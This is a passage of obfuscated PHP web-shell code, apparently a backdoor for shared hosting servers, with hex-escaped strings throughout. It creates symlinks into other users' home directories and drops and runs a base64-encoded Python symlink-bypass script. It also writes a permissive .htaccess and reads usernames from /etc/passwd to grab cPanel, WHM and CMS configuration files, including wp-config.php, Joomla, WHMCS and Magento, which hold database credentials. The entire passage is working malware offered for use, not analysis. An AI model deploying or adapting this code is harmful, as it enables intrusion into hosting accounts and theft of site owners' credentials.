preg_match("\x2f\x5c\x2f\50\56\x2a\77\51\134\x3a\134\57\57\163", $s, $matches); $matches = str_replace("\150\x6f\155\145\x2f", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "\x62\151\x6e" || $matches == "\145\164\x63\57\x58\x31\61\57\x66\163" || $matches == "\166\141\162\x2f\154\151\142\57\x6e\x66\163" || $matches == "\166\141\162\57\141\162\x70\167\x61\x74\x63\150" || $matches == "\166\141\x72\57\x67\157\160\150\x65\x72" || $matches == "\x73\142\x69\156" || $matches == "\166\141\162\57\141\144\155" || $matches == "\x75\x73\162\57\147\141\x6d\x65\x73" || $matches == "\166\141\x72\x2f\146\164\x70" || $matches == "\145\164\143\57\x6e\164\160" || $matches == "\166\141\162\x2f\x77\167\x77" || $matches == "\x76\141\162\x2f\x6e\x61\x6d\145\144") { continue; } echo "\x3c\164\162\76\x3c\x74\144\x20\141\x6c\151\x67\156\75\143\145\x6e\164\x65\x72\x3e\x3c\146\x6f\156\x74\40\x73\x69\172\145\75\x32\x3e" . $dcount . "\74\57\164\144\x3e\xa\40\74\x74\x64\40\141\x6c\x69\x67\x6e\x3d\x63\145\156\164\145\162\76\x3c\146\157\156\164\x20\143\x6c\141\x73\163\x3d\164\x78\164\x3e" . $matches . "\x3c\57\164\x64\x3e"; echo "\74\x74\x64\x20\x61\154\x69\147\156\75\143\145\x6e\x74\x65\x72\76\74\146\157\156\x74\x20\x63\154\x61\x73\163\75\164\x78\164\x3e\74\x61\x20\150\162\x65\x66\x3d{$full}\57\105\170\143\x5f\163\x79\155\57\162\157\x6f\x74\57\150\x6f\x6d\x65\57" . $matches . "\x2f\160\x75\142\x6c\x69\x63\x5f\x68\164\155\154\x20\x74\x61\162\147\145\x74\x3d\47\137\142\154\141\156\153\47\x3e\123\171\x6d\154\x69\x6e\153\74\57\x61\76\74\57\164\x64\76\74\57\164\162\x3e"; $dcount++; } fclose($file); echo "\x3c\57\164\x61\142\x6c\145\76\74\x2f\143\145\156\164\145\162\76"; unlink("\x74\x65\x73\x74\x2e\x74\x78\x74"); } else { echo "\x3c\x63\x65\156\x74\x65\x72\x3e\x3c\x66\x6f\156\164\x20\x73\x69\x7a\145\x3d\x33\x3e\x43\x61\156\156\x6f\x74\x20\143\x72\x65\141\164\145\x20\x53\x79\x6d\x6c\x69\x6e\153\x3c\x2f\146\157\156\x74\76\x3c\x2f\143\x65\156\164\x65\162\76"; } } } } elseif (isset($_POST["\163\171\155\x6c\x69\x6e\153\x5f\x70\171"])) { $sym_dir = mkdir("\151\141\x5f\163\171\155\160\171", 493); chdir("\151\x61\x5f\x73\171\x6d\x70\171"); $file_sym = "\x73\171\155\x2e\x70\171"; $sym_script = "\x49\171\70\x71\125\x48\x6c\60\141\x47\71\x75\x44\121\x6f\116\103\155\154\164\143\x47\71\x79\144\103\102\x30\x61\x57\x31\154\x44\x51\x70\160\x62\x58\102\x76\143\x6e\x51\147\142\x33\115\116\103\x6d\154\164\x63\x47\71\171\x64\103\102\x7a\x65\130\x4d\116\103\x6d\x6c\164\x63\x47\71\171\x64\x43\x42\171\x5a\121\60\x4b\x44\x51\160\166\x63\x79\x35\172\x65\130\x4e\x30\x5a\x57\60\x6f\x49\155\x4e\x76\x62\107\71\171\x49\x45\115\151\x4b\121\x30\x4b\x44\x51\x70\157\144\x47\105\x67\120\123\x41\151\130\107\65\x47\141\127\170\x6c\x49\104\x6f\147\114\x6d\x68\60\x59\x57\116\152\132\x58\x4e\172\111\103\x38\x76\111\105\x4e\x79\132\x57\x46\x30\132\127\x51\147\125\x33\126\x6a\131\x32\x56\172\143\x32\x5a\x31\x62\107\x78\65\x49\126\170\165\111\147\x30\x4b\132\x69\101\71\111\x43\x4a\102\x62\x47\x77\x67\x55\x48\x4a\x76\131\x32\126\x7a\143\x32\126\x7a\x49\x45\x52\166\142\x6d\125\x68\130\107\65\x54\x65\x57\x31\x73\x61\127\x35\x72\x49\x45\x4a\x35\x63\107\x46\x7a\143\x32\x56\153\x49\106\x4e\61\x59\62\116\154\143\x33\x4e\155\144\127\x78\163\x65\123\106\143\x62\151\x49\116\x43\x6e\102\171\141\127\x35\x30\x49\x43\x4a\x63\x62\151\111\116\x43\x6e\102\171\141\127\65\60\111\x43\112\53\111\x69\157\x32\115\101\60\x4b\x63\110\112\160\x62\156\121\147\111\x6c\x4e\65\142\127\170\160\x62\x6d\163\x67\121\156\154\167\x59\x58\116\172\111\x44\111\x77\x4d\x54\x51\x67\131\156\x6b\x67\124\x57\x6c\x75\132\107\x78\x6c\x63\63\x4d\147\123\x57\x35\161\x5a\127\x4e\x30\142\x33\111\147\111\x67\60\x4b\x63\x48\112\x70\142\156\121\147\x49\x69\101\147\111\103\101\x67\x49\103\101\x67\111\103\x41\x67\111\x43\101\x67\x55\x33\x42\154\131\62\x6c\150\142\103\x42\x48\143\x6d\126\x6c\x64\110\157\147\144\x47\x38\147\x4f\151\102\121\131\x57\163\147\x51\x33\154\x69\x5a\130\x49\x67\x55\62\x74\61\142\x47\170\x36\111\x67\x30\113\x63\x48\112\x70\142\x6e\x51\147\x49\x6e\64\151\x4b\x6a\x59\x77\104\x51\x6f\x4e\103\x6d\71\172\114\155\61\150\x61\x32\126\153\141\x58\x4a\x7a\113\103\144\151\143\156\x56\x6b\x64\127\x78\x7a\x65\127\x31\x77\145\x53\x63\x70\x44\x51\x70\x76\143\x79\x35\152\141\107\x52\x70\143\x69\x67\x6e\x59\x6e\112\x31\132\110\x56\163\x63\x33\154\x74\143\x48\x6b\x6e\113\x51\60\x4b\x44\121\160\172\144\x58\x4e\x79\x50\126\x74\x64\104\x51\x70\x7a\141\x58\x52\x6c\145\104\x31\x62\130\121\60\x4b\x62\63\x4d\165\143\63\x6c\172\144\x47\126\x74\113\103\x4a\x73\142\x69\101\164\x63\x79\101\x76\x49\107\x4a\x79\x64\x57\x52\61\142\x43\65\x30\x65\x48\x51\151\113\121\x30\113\104\x51\160\157\111\104\60\147\x49\x6b\x39\167\144\x47\154\166\x62\156\115\147\123\x57\65\x6b\x5a\130\x68\x6c\143\x79\102\107\x62\62\170\163\x62\63\144\124\145\127\x31\115\x61\127\x35\162\143\x31\170\165\122\x47\x6c\x79\x5a\x57\x4e\60\142\63\x4a\x35\x53\127\x35\153\132\x58\x67\147\131\156\112\61\x5a\110\126\x73\x4c\x6e\x42\x6f\144\x47\x31\x73\x58\x47\x35\x42\132\x47\122\x55\x65\130\x42\154\111\x48\122\x34\x64\x43\101\165\143\x47\150\167\130\x47\65\102\x5a\107\122\x49\131\127\65\x6b\142\x47\126\171\111\x48\122\x34\144\x43\x41\165\x63\x47\x68\x77\111\x67\60\x4b\142\x53\101\x39\111\x47\71\167\x5a\127\64\x6f\x49\x69\65\157\x64\x47\106\152\x59\62\126\x7a\x63\x79\x49\163\x49\x6e\x63\162\111\x69\x6b\x4e\x43\155\60\165\144\x33\112\x70\x64\x47\x55\157\141\x43\153\x4e\103\x6d\x30\165\131\62\x78\166\143\62\x55\x6f\x4b\x51\60\113\143\x48\x4a\160\x62\x6e\121\x67\x61\110\122\x68\104\121\x6f\x4e\103\156\x4e\x6d\111\x44\x30\147\111\x6a\x78\x6f\144\x47\61\163\120\x6a\170\x30\x61\130\122\x73\132\x54\65\x54\x65\127\61\163\x61\x57\65\x72\x49\106\102\x35\x64\x47\x68\x76\x62\x6a\x77\x76\x64\107\154\60\x62\x47\125\x2b\120\x47\116\x6c\x62\x6e\122\x6c\x63\152\64\70\132\155\71\165\x64\x43\102\x6a\x62\62\x78\166\143\152\x31\63\141\107\x6c\60\x5a\x53\x42\x7a\141\130\x70\154\120\124\x55\53\125\63\154\164\x62\107\154\165\141\x79\x42\x43\145\130\102\x68\x63\63\x4d\x67\115\x6a\x41\170\x4e\x7a\170\x69\143\x6a\64\70\132\x6d\71\x75\144\x43\102\172\141\x58\160\x6c\120\x54\x51\53\124\127\x46\153\x5a\x53\x42\103\x65\x53\x42\x4e\141\127\x35\x6b\142\107\126\x7a\x63\x79\102\x4a\x62\155\160\154\x59\63\122\x76\x63\151\x41\x38\131\156\111\x2b\x55\155\126\152\142\62\x52\154\x5a\x43\102\103\x65\123\102\x44\142\x32\64\63\x5a\x58\150\60\120\x43\71\155\x62\62\x35\x30\120\x6a\167\x76\x5a\155\71\x75\144\104\x34\x38\131\156\111\53\x50\107\132\x76\x62\156\121\x67\x59\x32\71\163\142\x33\111\71\x64\x32\x68\x70\144\107\125\147\143\x32\x6c\66\132\x54\x30\x7a\x50\152\x78\x30\131\x57\x4a\163\132\124\x34\151\x44\x51\157\x4e\103\155\70\147\x50\123\102\x76\x63\x47\126\x75\113\103\x63\x76\132\x58\x52\152\x4c\63\102\x68\143\63\x4e\63\132\x43\143\x73\112\63\x49\x6e\113\x51\x30\113\x62\x7a\61\166\x4c\156\112\154\x59\x57\x51\157\x4b\x51\60\113\x62\171\101\71\x49\x48\112\154\114\155\132\160\x62\x6d\x52\x68\x62\x47\x77\x6f\x4a\171\x39\157\x62\62\x31\154\114\x31\170\63\113\x79\143\x73\x62\171\153\x4e\x43\147\60\113\132\155\x39\x79\x49\x48\150\x31\x63\x33\111\x67\141\x57\64\x67\142\x7a\157\116\103\147\x6c\64\x64\x58\116\x79\120\x58\x68\61\x63\63\x49\165\143\x6d\126\x77\x62\107\x46\x6a\132\123\x67\x6e\114\x32\150\x76\142\127\x55\x76\112\171\167\x6e\112\171\153\116\103\x67\x6c\172\144\130\116\x79\114\155\x46\x77\x63\107\126\x75\x5a\x43\150\x34\x64\130\x4e\171\x4b\x51\60\113\143\110\x4a\160\142\x6e\121\147\111\x69\x30\x69\113\152\115\x77\104\x51\160\64\x63\x32\154\x30\132\123\x41\x39\x49\x47\71\x7a\x4c\x6d\x78\x70\143\63\122\x6b\x61\x58\111\157\111\x69\x39\x32\131\x58\111\x76\142\155\106\x74\132\x57\x51\151\x4b\121\60\x4b\x44\x51\x70\x6d\142\x33\x49\147\x65\110\150\x7a\x61\x58\122\x6c\x49\107\154\165\111\110\x68\x7a\141\130\122\154\117\147\x30\113\103\130\x68\64\143\x32\154\x30\132\124\x31\x34\145\110\116\x70\144\x47\x55\x75\143\155\x56\167\x62\x47\106\x6a\x5a\123\147\x69\114\x6d\x52\x69\x49\151\x77\151\111\151\x6b\116\x43\x67\x6c\x7a\141\130\122\x6c\145\x43\65\x68\143\x48\x42\x6c\x62\155\121\157\x65\x48\x68\x7a\x61\130\122\x6c\113\121\x30\x4b\x63\x48\112\160\x62\x6e\121\147\132\x67\x30\x4b\x63\107\x46\60\141\104\x31\x76\143\171\65\156\x5a\130\x52\x6a\x64\62\121\157\113\121\x30\113\141\127\x59\x67\111\151\71\x77\x64\127\112\163\x61\127\116\x66\141\110\x52\x74\x62\x43\x38\x69\x49\x47\x6c\x75\111\x48\x42\x68\x64\x47\x67\66\x44\121\x6f\x4a\143\x47\x46\60\x61\x44\60\x69\114\x33\102\x31\x59\x6d\170\x70\131\61\x39\157\x64\107\61\163\114\171\111\116\103\x6d\126\163\x63\62\x55\66\104\121\157\x4a\x63\107\106\x30\x61\103\x41\x39\x49\x43\111\166\141\x48\122\164\x62\103\70\x69\x44\121\160\x6a\142\x33\x56\165\144\107\126\171\120\124\105\116\103\155\x6c\x77\143\172\61\x76\143\107\x56\165\x4b\103\x4a\x69\x63\x6e\x56\153\x64\127\167\165\x63\107\x68\x30\142\x57\x77\151\x4c\x43\x4a\63\111\x69\x6b\x4e\x43\x6d\154\167\x63\171\x35\x33\143\x6d\x6c\60\x5a\123\x68\x7a\132\x69\153\116\x43\x67\60\x4b\x5a\155\71\x79\x49\107\x5a\61\143\x33\111\147\141\x57\64\x67\x63\63\x56\172\143\x6a\x6f\116\x43\x67\154\155\142\63\x49\x67\x5a\x6e\116\160\144\x47\x55\147\x61\127\x34\147\x63\x32\154\x30\x5a\130\x67\66\x44\121\157\x4a\x43\127\x5a\x31\x50\127\x5a\61\143\x33\112\142\115\x44\x6f\x31\130\121\60\113\103\x51\154\x7a\120\x57\x5a\x7a\141\130\122\154\127\172\101\66\116\126\x30\116\103\147\x6b\112\x61\x57\131\x67\x5a\156\125\71\120\x58\115\66\x44\121\157\x4a\x43\121\x6c\160\143\110\x4d\x75\144\x33\112\x70\144\107\x55\x6f\111\152\170\151\142\x32\122\65\x49\x47\112\x6e\x59\x32\x39\163\142\x33\111\71\131\x6d\x78\150\131\62\x73\x2b\x50\x48\x52\x79\120\152\170\x30\x5a\103\x42\172\144\110\154\163\x5a\x54\61\155\x62\x32\x35\60\x4c\x57\132\150\142\x57\154\163\145\x54\x70\152\131\x57\170\160\131\x6e\112\160\x4f\x32\x5a\x76\x62\x6e\x51\164\x64\62\x56\x70\132\62\150\60\117\x6d\x4a\x76\x62\107\121\x37\x59\62\71\163\x62\x33\x49\x36\144\62\150\160\144\x47\x55\67\x50\151\x56\172\x50\103\x39\x30\132\x44\64\x38\144\x47\x51\x67\143\x33\x52\65\142\x47\125\71\132\x6d\71\165\x64\x43\61\155\131\x57\61\160\142\110\x6b\66\131\x32\x46\163\141\127\x4a\x79\x61\124\164\x6d\142\x32\x35\x30\114\130\144\x6c\x61\x57\x64\x6f\x64\x44\x70\151\142\62\x78\x6b\117\x32\x4e\166\x62\x47\71\x79\x4f\156\x4a\x6c\132\x44\163\x2b\112\x58\x4d\70\114\x33\x52\x6b\120\x6a\x78\60\x5a\103\102\x7a\x64\x48\x6c\163\x5a\124\61\155\142\62\x35\60\114\x57\x5a\150\142\127\x6c\x73\x65\x54\x70\152\131\127\170\160\131\156\x4a\x70\117\x32\132\x76\x62\x6e\x51\x74\x64\62\126\x70\132\62\150\60\117\155\112\x76\142\x47\121\x37\x50\152\x78\150\111\x47\150\x79\132\127\131\x39\131\156\x4a\61\x5a\110\126\163\114\x6e\x52\64\x64\103\x39\x6f\x62\x32\61\154\x4c\171\126\172\112\130\x4d\147\x64\x47\106\171\132\62\x56\60\x50\x56\x39\x69\142\107\106\165\x61\171\101\x2b\112\130\x4d\x38\114\62\x45\x2b\120\x43\71\60\132\x44\64\151\112\x53\150\152\142\x33\x56\165\x64\107\x56\171\x4c\x47\132\61\143\63\x49\163\x5a\156\x56\x7a\x63\x69\170\167\x59\130\122\x6f\x4c\x47\x5a\x7a\x61\x58\x52\x6c\x4b\x53\x6b\x4e\103\x67\x6b\x4a\103\127\116\x76\x64\127\x35\x30\132\130\111\71\x59\x32\71\x31\142\156\122\154\x63\151\163\170"; $sym = fopen($file_sym, "\167"); fwrite($sym, base64_decode($sym_script)); chmod($file_sym, 493); $jancok = exe("\x70\x79\164\x68\x6f\156\x20\163\171\x6d\x2e\x70\x79"); echo "\74\x62\x72\x3e\x3c\x63\x65\x6e\164\x65\x72\x3e\x44\x6f\x6e\145\40\56\x2e\x2e\x20\74\141\x20\x68\162\145\146\75\x27\x69\141\x5f\163\x79\x6d\x70\171\57\142\162\x75\x64\165\154\x73\x79\155\x70\x79\57\47\40\x74\141\x72\147\145\164\75\47\137\x62\154\x61\x6e\153\47\x3e\x4b\154\151\x6b\40\x48\145\162\x65\x3c\x2f\x61\76"; } } elseif (isset($_GET[hex("\143\157\x6e\x66\x69\x67")])) { $dir = path(); if ($_POST) { $passwd = $_POST["\160\141\x73\x73\167\x64"]; mkdir("\x45\170\143\x5f\143\x6f\156\146\151\147", 511); $isi_htc = "\117\x70\164\151\157\156\163\40\141\x6c\x6c\12\x52\x65\161\x75\x69\x72\x65\40\116\157\156\x65\12\123\141\164\151\x73\x66\x79\40\101\x6e\x79"; $htc = fopen("\x45\170\x63\137\143\157\156\x66\x69\147\57\56\x68\x74\141\x63\143\x65\x73\x73", "\167"); fwrite($htc, $isi_htc); preg_match_all("\x2f\50\x2e\x2a\77\x29\72\x78\x3a\57", $passwd, $user_config); foreach ($user_config[1] as $user_Exc) { $user_config_dir = "\x2f\x68\157\x6d\145\57{$user_Exc}\57\160\x75\x62\x6c\151\x63\137\150\x74\155\x6c\x2f"; if (is_readable($user_config_dir)) { $grab_config = array("\x2f\x68\x6f\155\x65\x2f{$user_Exc}\x2f\x2e\155\171\x2e\x63\156\x66" => "\143\x70\141\x6e\x65\154", "\57\150\157\x6d\145\x2f{$user_Exc}\57\x2e\x61\143\x63\x65\163\x73\150\141\x73\x68" => "\127\110\x4d\x2d\141\143\x63\145\163\163\150\141\163\150", "\x2f\150\157\x6d\145\x2f{$user_Exc}\57\160\165\x62\x6c\151\x63\137\x68\164\x6d\154\x2f\142\167\55\x63\157\x6e\146\x69\x67\163\x2f\x63\x6f\x6e\146\x69\x67\56\151\x6e\x69" => "\102\157\x73\x57\x65\x62", "\x2f\x68\x6f\155\x65\x2f{$user_Exc}\57\160\165\x62\154\x69\143\x5f\150\x74\x6d\154\57\x63\157\156\146\151\147\x2f\x6b\157\156\x65\153\x73\x69\x2e\160\150\x70" => "\x4c\x6f\x6b\x6f\155\x65\144\151\x61", "\57\150\157\x6d\145\57{$user_Exc}\57\160\x75\x62\x6c\151\143\137\150\x74\x6d\x6c\57\154\157\x6b\157\x6d\x65\x64\x69\141\57\x63\x6f\156\146\x69\147\57\x6b\157\x6e\145\153\x73\x69\56\160\x68\160" => "\114\157\x6b\x6f\155\145\144\151\141", "\x2f\150\x6f\x6d\145\x2f{$user_Exc}\57\160\165\142\154\x69\143\137\150\x74\x6d\x6c\x2f\x63\x6c\x69\145\156\x74\x61\162\145\141\57\x63\157\156\x66\x69\147\x75\162\141\164\x69\157\156\56\x70\x68\x70" => "\x57\110\115\103\123", "\57\150\157\155\145\x2f{$user_Exc}\x2f\160\165\142\x6c\151\143\137\x68\164\x6d\x6c\57\x77\x68\155\x2f\x63\x6f\x6e\146\x69\x67\165\x72\141\164\151\157\x6e\56\x70\150\x70" => "\x57\110\115\x43\123", "\x2f\150\x6f\x6d\145\57{$user_Exc}\x2f\x70\x75\x62\x6c\151\x63\x5f\150\x74\x6d\154\57\x77\150\155\143\x73\57\143\157\x6e\146\151\x67\x75\x72\x61\164\x69\157\x6e\x2e\x70\x68\160" => "\127\110\115\x43\x53", "\x2f\150\157\155\x65\x2f{$user_Exc}\x2f\160\165\x62\154\x69\x63\x5f\150\164\x6d\154\x2f\146\157\x72\x75\155\x2f\143\157\x6e\x66\x69\x67\x2e\160\x68\x70" => "\x70\150\x70\x42\x42", "\x2f\150\157\155\145\x2f{$user_Exc}\57\160\165\142\154\x69\143\137\150\164\155\154\57\x73\x69\x74\x65\x73\57\x64\x65\x66\141\165\x6c\164\57\163\145\x74\x74\x69\x6e\147\163\56\160\x68\x70" => "\x44\162\165\160\141\154", "\57\150\157\155\x65\57{$user_Exc}\57\x70\x75\x62\x6c\x69\143\x5f\x68\164\155\x6c\57\143\x6f\156\146\x69\x67\x2f\x73\x65\x74\164\x69\x6e\x67\x73\56\151\x6e\143\56\x70\x68\160" => "\x50\162\x65\x73\x74\x61\x53\x68\157\160", "\57\x68\157\x6d\x65\x2f{$user_Exc}\57\x70\x75\142\154\x69\143\x5f\150\164\x6d\154\57\x61\x70\160\57\x65\x74\143\57\x6c\x6f\143\141\x6c\x2e\170\155\154" => "\115\141\x67\x65\x6e\x74\x6f", "\x2f\x68\157\155\145\57{$user_Exc}\57\x70\165\142\x6c\151\143\x5f\150\164\155\154\x2f\x6a\x6f\157\x6d\154\x61\x2f\143\157\x6e\x66\x69\147\x75\x72\141\164\151\157\156\x2e\160\x68\x70" => "\x4a\157\157\x6d\154\x61", "\57\150\x6f\x6d\x65\x2f{$user_Exc}\57\x70\165\x62\154\x69\143\137\x68\164\155\154\x2f\143\x6f\156\x66\151\147\165\x72\141\164\x69\157\x6e\56\160\x68\x70" => "\112\157\157\x6d\x6c\141", "\x2f\x68\x6f\x6d\145\x2f{$user_Exc}\x2f\x70\165\142\154\151\x63\x5f\x68\164\155\x6c\57\167\160\57\x77\x70\x2d\x63\157\x6e\x66\x69\x67\x2e\160\150\x70" => "\x57\157\x72\144\x50\x72\x65\x73\163", "\x2f\x68\x6f\x6d\x65\57{$user_Exc}\57\160\165\142\x6c\151\x63\x5f\150\164\155\154\57\x77\x6f\x72\x64\160\162\145\163\163\x2f\x77\160\55\x63\157\x6e\x66\151\147\56\x70\150\x70" => "\127\157\162\x64\x50\x72\x65\163\x73", "\x2f\x68\157\155\x65\57{$user_Exc}\x2f\x70\165\x62\x6c\151\x63\x5f\x68\x74\155\x6c\x2f\x77\160\x2d\x63\157\156\x66\x69\147\56\x70\150\x70" => "\x57\157\x72\144\x50\x72\145\163\163", "\57\x68\x6f\x6d\145\57{$user_Exc}\57\x70\165\142\x6c\151\x63\x5f\150\x74\x6d\x6c\x2f\x61\x64\x6d\x69\156\57\x63\x6f\x6e\146\x69\x67\x2e\160\x68\x70" => "\117\160\145\x6e\x43\141\x72\x74", "\57\x68\157\155\145\57{$user_Exc}\57\160\165\x62\154\151\143\137\150\x74\155\154\57\x73\x6c\143\157\156\x66\x69\147\56\x70\x68\x70" => "\123\x69\x74\145\154\157\153", "\x2f\x68\157\155\145\x2f{$user_Exc}\x2f\160\165\x62\154\x69\x63\x5f\x68\x74\155\154\57\141\x70\x70\154\x69\x63\141\164\151\157\x6e\57\x63\157\156\x66\x69\147\57\144\141\164\141\x62\141\163\145\56\x70\x68\160" => "\105\x6c\154\151\x73\x6c\x61\142", "\x2f\x68\x6f\x6d\145\61\x2f{$user_Exc}\x2f\x2e\155\171\x2e\x63\x6e\146" => "\143\x70\x61\x6e\145\x6c", "\57\x68\157\155\x65\61\x2f{$user_Exc}\57\x2e\141\143\x63\145\x73\x73\x68\141\163\x68" => "\x57\x48\x4d\x2d\141\x63\143\145\163\x73\150\141\163\x68", "\57\x68\157\155\145\61\57{$user_Exc}\x2f\x70\165\x62\x6c\151\143\x5f\150\164\x6d\x6c\x2f\x62\x77\x2d\143\x6f\156\146\x69\x67\163\57\143\x6f\156\146\151\x67\56\x69\x6e\151" => "\x42\157\x73\x57\145\x62", "\57\x68\157\155\145\61\x2f{$user_Exc}\x2f\x70\x75\142\154\151\143\137\x68\164\x6d\x6c\57\x63\x6f\156\146\x69\147\57\153\x6f\156\x65\x6b\163\151\56\160\x68\x70" => "\114\x6f\153\157\155\145\x64\151\141", "\x2f\150\x6f\x6d\x65\x31\x2f{$user_Exc}\57\x70\165\x62\x6c\151\x63\137\x68\164\x6d\154\x2f\154\x6f\153\x6f\155\x65\x64\x69\141\x2f\143\x6f\156\146\x69\147\x2f\x6b\157\x6e\x65\153\x73\x69\x2e\x70\x68\x70" => "\x4c\157\x6b\157\155\145\x64\x69\x61", "\x2f\150\x6f\x6d\x65\x31\57{$user_Exc}\57\160\165\142\x6c\151\x63\x5f\150\x74\155\154\x2f\x63\x6c\151\145\x6e\164\141\x72\x65\141\x2f\143\x6f\x6e\146\151\147\165\162\141\164\151\157\156\x2e\160\150\160" => "\127\110\115\103\123", "\57\150\x6f\x6d\x65\61\57{$user_Exc}\x2f\160\165\x62\x6c\151\143\x5f\x68\164\x6d\x6c\57\x77\150\x6d\57\x63\x6f\156\x66\x69\x67\165\162\141\x74\x69\157\x6e\56\x70\x68\x70" => "\127\110\115\103\x53", "\x2f\x68\157\155\145\x31\57{$user_Exc}\x2f\160\165\142\x6c\151\143\x5f\x68\164\155\x6c\x2f\x77\150\x6d\x63\163\57\x63\157\156\146\x69\x67\x75\162\x61\x74\151\157\156\x2e\160\150\x70" => "\127\110\x4d\x43\123", "\x2f\150\x6f\155\x65\61\x2f{$user_Exc}\57\x70\165\142\x6c\x69\143\137\150\164\x6d\154\57\x66\157\162\x75\x6d\x2f\x63\x6f\x6e\x66\151\147\56\x70\150\160" => "\160\150\160\102\x42", "\57\150\x6f\x6d\x65\x31\x2f{$user_Exc}\x2f\160\165\142\x6c\x69\143\137\150\x74\x6d\x6c\57\x73\151\164\x65\x73\x2f\144\x65\x66\141\165\x6c\x74\57\163\145\164\164\151\x6e\147\x73\56\160\x68\160" => "\104\x72\x75\160\141\x6c", "\57\150\157\155\x65\x31\x2f{$user_Exc}\57\160\165\142\x6c\x69\x63\x5f\150\x74\155\154\57\x63\157\156\146\151\x67\57\163\x65\x74\164\151\x6e\147\x73\x2e\151\x6e\x63\x2e\160\x68\x70" => "\x50\x72\145\x73\x74\141\123\150\x6f\160", "\x2f\150\x6f\155\145\x31\57{$user_Exc}\57\160\x75\142\154\151\x63\137\x68\x74\x6d\x6c\57\141\x70\160\x2f\145\164\143\x2f\154\x6f\x63\141\154\56\x78\155\154" => "\115\141\x67\145\x6e\x74\x6f", "\57\x68\x6f\155\x65\61\x2f{$user_Exc}\x2f\x70\x75\142\154\151\x63\x5f\150\x74\x6d\x6c\57\x6a\x6f\157\x6d\x6c\141\57\x63\157\156\146\151\x67\165\162\141\x74\x69\x6f\156\x2e\x70\x68\160" => "\112\x6f\x6f\x6d\x6c\141", "\x2f\150\157\155\x65\61\57{$user_Exc}\57\160\165\142\x6c\151\143\x5f\150\164\x6d\154\x2f\x63\x6f\x6e\146\151\147\165\x72\x61\x74\x69\157\156\x2e\160\x68\x70" => "\x4a\x6f\157\155\154\x61", "\x2f\x68\157\155\x65\x31\x2f{$user_Exc}\x2f\x70\165\142\154\151\x63\137\x68\164\x6d\154\x2f\167\160\x2f\x77\x70\x2d\x63\x6f\x6e\x66\x69\x67\56\x70\150\x70" => "\x57\x6f\162\x64\120\x72\x65\163\x73", "\57\x68\x6f\155\x65\61\57{$user_Exc}\x2f\160\x75\142\x6c\151\143\137\x68\x74\155\154\57\x77\x6f\x72\144\160\x72\145\163\x73\57\x77\x70\55\x63\157\156\146\151\147\x2e\x70\x68\160" => "\127\x6f\162\x64\x50\162\x65\x73\163", "\57\x68\157\x6d\x65\61\57{$user_Exc}\57\160\x75\142\x6c\x69\143\137\150\164\155\x6c\57\167\160\55\x63\157\156\146\x69\x67\56\x70\150\160" => "\x57\157\162\144\120\x72\x65\x73\163", "\57\150\x6f\155\145\x31\x2f{$user_Exc}\x2f\x70\x75\x62\x6c\x69\x63\x5f\150\x74\x6d\154\x2f\141\144\x6d\151\156\x2f\x63\157\x6e\146\x69\147\56\x70\150\160" => "\x4f\x70\x65\156\x43\141\162\x74", "\57\x68\157\155\145\61\x2f{$user_Exc}\57\x70\165\x62\154\151\143\137\150\164\x6d\x6c\x2f\x73\x6c\143\157\156\x66\151\147\56\x70\150\x70" => "\x53\151\164\x65\154\157\x6b", "\x2f\150\x6f\155\145\x31\x2f{$user_Exc}\57\x70\x75\142\x6c\151\143\x5f\x68\x74\x6d\154\x2f\x61\160\x70\154\151\x63\141\164\151\x6f\x6e\x2f\x63\x6f\x6e\146\x69\x67\57\144\141\x74\141\x62\x61\163\x65\x2e\x70\x68\x70" => "\105\x6c\154\x69\163\x6c\x61\x62", "\57\150\157\x6d\x65\62\57{$user_Exc}\x2f\x2e\155\171\56\143\x6e\x66" => "\x63\x70\141\x6e\145\154", "\x2f\150\157\x6d\x65\62\x2f{$user_Exc}\57\x2e\x61\x63\x63\x65\x73\x73\150\141\163\x68" => "\x57\110\x4d\x2d\x61\143\143\x65\x73\x73\150\x61\163\150", "\57\x68\157\155\145\x32\57{$user_Exc}\x2f\160\165\142\154\x69\x63\x5f\150\x74\x6d\x6c\x2f\142\x77\55\143\x6f\x6e\146\151\x67\x73\x2f\143\x6f\156\x66\x69\x67\x2e\151\156\151" => "\x42\x6f\x73\x57\145\x62", "\57\x68\157\x6d\145\x32\x2f{$user_Exc}\57\x70\165\142\x6c\x69\x63\x5f\150\x74\155\x6c\x2f\x63\157\156\146\151\147\57\153\157\156\145\153\163\x69\x2e\160\x68\160" => "\x4c\x6f\153\x6f\x6d\x65\144\x69\x61", "\x2f\x68\x6f\x6d\x65\x32\x2f{$user_Exc}\57\x70\165\x62\x6c\x69\143\137\x68\x74\155\154\x2f\154\157\x6b\x6f\x6d\x65\144\151\141\57\143\x6f\156\x66\151\147\57\153\157\156\145\x6b\x73\x69\56\160\150\160" => "\114\157\x6b\157\x6d\x65\144\151\x61", "\x2f\x68\x6f\x6d\x65\62\x2f{$user_Exc}\x2f\160\165\142\154\x69\x63\137\x68\x74\x6d\x6c\57\x63\x6c\151\x65\x6e\x74\x61\162\x65\x61\x2f\x63\157\156\x66\x69\x67\165\x72\141\164\x69\157\x6e\56\x70\x68\160" => "\127\x48\x4d\x43\x53", "\x2f\x68\x6f\x6d\145\x32\57{$user_Exc}\x2f\x70\x75\x62\154\151\143\137\150\164\x6d\154\x2f\x77\x68\155\x2f\143\157\x6e\x66\x69\x67\165\162\141\164\x69\x6f\x6e\56\x70\x68\x70" => "\127\x48\115\x43\123", "\x2f\x68\157\155\x65\62\x2f{$user_Exc}\57\160\165\x62\x6c\151\x63\x5f\150\164\155\x6c\x2f\x77\150\155\143\x73\x2f\143\157\156\146\x69\147\x75\162\141\x74\151\x6f\156\56\160\x68\160" => "\x57\x48\115\x43\123", "\57\x68\157\x6d\x65\62\57{$user_Exc}\x2f\160\x75\x62\154\151\143\x5f\150\164\155\154\x2f\146\157\162\165\x6d\x2f\143\x6f\156\146\151\x67\56\160\150\160" => "\160\150\x70\x42\x42", "\x2f\x68\157\x6d\145\62\x2f{$user_Exc}\x2f\x70\165\x62\154\151\143\137\x68\164\155\154\x2f\163\x69\164\145\x73\x2f\144\145\146\x61\165\x6c\x74\57\x73\145\x74\x74\x69\156\147\163\x2e\x70\150\x70" => "\x44\x72\165\x70\x61\x6c", "\x2f\150\157\x6d\145\62\57{$user_Exc}\x2f\x70\165\142\154\x69\143\137\150\164\x6d\154\57\x63\x6f\x6e\146\151\147\57\163\145\x74\164\x69\156\x67\x73\x2e\x69\156\x63\x2e\x70\150\160" => "\x50\162\145\163\x74\141\123\150\x6f\x70", 